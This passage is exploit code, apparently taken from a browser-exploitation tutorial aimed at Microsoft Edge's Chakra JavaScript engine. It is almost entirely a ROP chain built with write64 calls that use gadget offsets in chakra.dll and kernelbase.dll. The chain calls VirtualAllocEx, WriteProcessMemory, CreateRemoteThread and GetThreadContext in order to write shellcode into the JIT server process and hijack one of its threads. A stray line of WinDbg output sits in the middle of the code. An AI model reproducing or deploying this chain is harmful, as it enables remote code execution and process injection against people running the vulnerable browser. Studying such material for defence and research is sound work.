write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        

// GetThreadContext() ROP chain
// Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

// First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
// The value we need to set is 0x10001F
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// HANDLE hThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future mov qword [rax+0x20], rcx gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

// Call KERNELBASE!GetThreadContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
